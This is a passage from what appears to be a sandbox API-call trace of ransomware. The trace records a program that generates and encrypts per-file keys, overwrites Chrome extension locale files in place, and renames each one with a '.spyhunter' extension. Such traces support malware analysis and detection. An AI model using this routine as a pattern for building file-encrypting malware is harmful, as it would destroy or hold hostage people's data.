HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json.spyhunter")) returned 1 [0136.285] GetProcessHeap () returned 0x2c0000 [0136.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.285] GetProcessHeap () returned 0x2c0000 [0136.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0136.286] GetProcessHeap () returned 0x2c0000 [0136.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc91e8 | out: hHeap=0x2c0000) returned 1 [0136.287] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f5d8 | out: pbBuffer=0x248f5d8) returned 1 [0136.287] GetProcessHeap () returned 0x2c0000 [0136.287] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0136.287] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f5d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f5d0*=0x30) returned 1 [0136.287] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0136.287] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json") returned 155 [0136.288] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.288] GetProcessHeap () returned 0x2c0000 [0136.288] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0136.288] ReadFile (in: hFile=0x188, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f594, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f594*=0xdd, lpOverlapped=0x0) returned 1 [0136.289] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xffffff23, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.289] WriteFile (in: hFile=0x188, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xdd, lpNumberOfBytesWritten=0x248f594, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f594*=0xdd, lpOverlapped=0x0) returned 1 [0136.289] GetProcessHeap () returned 0x2c0000 [0136.289] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0136.289] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.289] WriteFile (in: hFile=0x188, lpBuffer=0x248f5d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f594, lpOverlapped=0x0 | out: lpBuffer=0x248f5d4*, lpNumberOfBytesWritten=0x248f594*=0x4, lpOverlapped=0x0) returned 1 [0136.289] WriteFile (in: hFile=0x188, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f594, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f594*=0x30, lpOverlapped=0x0) returned 1 [0136.289] CloseHandle (hObject=0x188) returned 1 [0136.289] GetProcessHeap () returned 0x2c0000 [0136.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.289] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json.spyhunter") returned 165 [0136.290] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json.spyhunter")) returned 1 [0136.290] GetProcessHeap () returned 0x2c0000 [0136.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.290] GetProcessHeap () returned 0x2c0000 [0136.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0136.290] GetProcessHeap () returned 0x2c0000 [0136.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc8ed8 | out: hHeap=0x2c0000) returned 1 [0136.292] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f5d0 | out: pbBuffer=0x248f5d0) returned 1 [0136.292] GetProcessHeap () returned 0x2c0000 [0136.292] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0136.292] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f5c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f5c8*=0x30) returned 1 [0136.292] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0136.292] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json") returned 155 [0136.292] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.292] GetProcessHeap () returned 0x2c0000 [0136.293] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0136.293] ReadFile (in: hFile=0x188, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f58c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f58c*=0xd5, lpOverlapped=0x0) returned 1 [0136.293] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xffffff2b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.293] WriteFile (in: hFile=0x188, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xd5, lpNumberOfBytesWritten=0x248f58c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f58c*=0xd5, lpOverlapped=0x0) returned 1 [0136.294] GetProcessHeap () returned 0x2c0000 [0136.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0136.294] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.294] WriteFile (in: hFile=0x188, lpBuffer=0x248f5cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f58c, lpOverlapped=0x0 | out: lpBuffer=0x248f5cc*, lpNumberOfBytesWritten=0x248f58c*=0x4, lpOverlapped=0x0) returned 1 [0136.294] WriteFile (in: hFile=0x188, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f58c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f58c*=0x30, lpOverlapped=0x0) returned 1 [0136.294] CloseHandle (hObject=0x188) returned 1 [0136.294] GetProcessHeap () returned 0x2c0000 [0136.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.294] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json.spyhunter") returned 165 [0136.294] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json.spyhunter")) returned 1 [0136.295] GetProcessHeap () returned 0x2c0000 [0136.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.295] GetProcessHeap () returned 0x2c0000 [0136.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0136.295] GetProcessHeap () returned 0x2c0000 [0136.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc8bc8 | out: hHeap=0x2c0000) returned 1 [0136.296] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f5c8 | out: pbBuffer=0x248f5c8) returned 1 [0136.296] GetProcessHeap () returned 0x2c0000 [0136.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0136.296] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f5c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f5c0*=0x30) returned 1 [0136.297] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0136.297] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json") returned 155 [0136.297] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.297] GetProcessHeap () returned 0x2c0000 [0136.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0136.297] ReadFile (in: hFile=0x188, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f584, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f584*=0xd1, lpOverlapped=0x0) returned 1 [0136.298] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xffffff2f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.298] WriteFile (in: hFile=0x188, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xd1, lpNumberOfBytesWritten=0x248f584, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f584*=0xd1, lpOverlapped=0x0) returned 1 [0136.298] GetProcessHeap () returned 0x2c0000 [0136.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0136.298] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.299] WriteFile (in: hFile=0x188, lpBuffer=0x248f5c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f584, lpOverlapped=0x0 | out: lpBuffer=0x248f5c4*, lpNumberOfBytesWritten=0x248f584*=0x4, lpOverlapped=0x0) returned 1 [0136.299] WriteFile (in: hFile=0x188, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f584, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f584*=0x30, lpOverlapped=0x0) returned 1 [0136.299] CloseHandle (hObject=0x188) returned 1 [0136.299] GetProcessHeap () returned 0x2c0000 [0136.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.299] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json.spyhunter") returned 165 [0136.299] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json.spyhunter")) returned 1 [0136.300] GetProcessHeap () returned 0x2c0000 [0136.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.300] GetProcessHeap () returned 0x2c0000 [0136.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0136.300] GetProcessHeap () returned 0x2c0000 [0136.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc88b8 | out: hHeap=0x2c0000) returned 1 [0136.301] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f5c0 | out: pbBuffer=0x248f5c0) returned 1 [0136.301] GetProcessHeap () returned 0x2c0000 [0136.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0136.302] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f5b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f5b8*=0x30) returned 1 [0136.302] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0136.302] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json") returned 155 [0136.302] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.302] GetProcessHeap () returned 0x2c0000 [0136.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0136.302] ReadFile (in: hFile=0x188, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f57c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f57c*=0xeb, lpOverlapped=0x0) returned 1 [0136.303] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xffffff15, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.303] WriteFile (in: hFile=0x188, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xeb, lpNumberOfBytesWritten=0x248f57c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f57c*=0xeb, lpOverlapped=0x0) returned 1 [0136.304] GetProcessHeap () returned 0x2c0000 [0136.304] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0136.304] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.304] WriteFile (in: hFile=0x188, lpBuffer=0x248f5bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f57c, lpOverlapped=0x0 | out: lpBuffer=0x248f5bc*, lpNumberOfBytesWritten=0x248f57c*=0x4, lpOverlapped=0x0) returned 1 [0136.304] WriteFile (in: hFile=0x188, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f57c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f57c*=0x30, lpOverlapped=0x0) returned 1 [0136.304] CloseHandle (hObject=0x188) returned 1 [0136.304] GetProcessHeap () returned 0x2c0000 [0136.304] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.304] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json.spyhunter") returned 165 [0136.304] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json.spyhunter")) returned 1 [0136.305] GetProcessHeap () returned 0x2c0000 [0136.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.305] GetProcessHeap () returned 0x2c0000 [0136.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0136.305] GetProcessHeap () returned 0x2c0000 [0136.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc85a8 | out: hHeap=0x2c0000) returned 1 [0136.306] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f5b8 | out: pbBuffer=0x248f5b8) returned 1 [0136.306] GetProcessHeap () returned 0x2c0000 [0136.306] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0136.306] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f5b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f5b0*=0x30) returned 1 [0136.307] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0136.307] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json") returned 155 [0136.307] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.307] GetProcessHeap () returned 0x2c0000 [0136.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0136.307] ReadFile (in: hFile=0x188, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f574, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f574*=0x117, lpOverlapped=0x0) returned 1 [0136.400] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xfffffee9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.400] WriteFile (in: hFile=0x188, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x117, lpNumberOfBytesWritten=0x248f574, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f574*=0x117, lpOverlapped=0x0) returned 1 [0136.400] GetProcessHeap () returned 0x2c0000 [0136.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0136.400] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.400] WriteFile (in: hFile=0x188, lpBuffer=0x248f5b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f574, lpOverlapped=0x0 | out: lpBuffer=0x248f5b4*, lpNumberOfBytesWritten=0x248f574*=0x4, lpOverlapped=0x0) returned 1 [0136.400] WriteFile (in: hFile=0x188, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f574, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f574*=0x30, lpOverlapped=0x0) returned 1 [0136.400] CloseHandle (hObject=0x188) returned 1 [0136.400] GetProcessHeap () returned 0x2c0000 [0136.400] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.400] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json.spyhunter") returned 165 [0136.400] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json.spyhunter")) returned 1 [0136.401] GetProcessHeap () returned 0x2c0000 [0136.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.401] GetProcessHeap () returned 0x2c0000 [0136.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0136.401] GetProcessHeap () returned 0x2c0000 [0136.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc8298 | out: hHeap=0x2c0000) returned 1 [0136.401] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f5b8 | out: pbBuffer=0x248f5b8) returned 1 [0136.401] GetProcessHeap () returned 0x2c0000 [0136.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0136.401] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f5b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f5b0*=0x30) returned 1 [0136.402] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 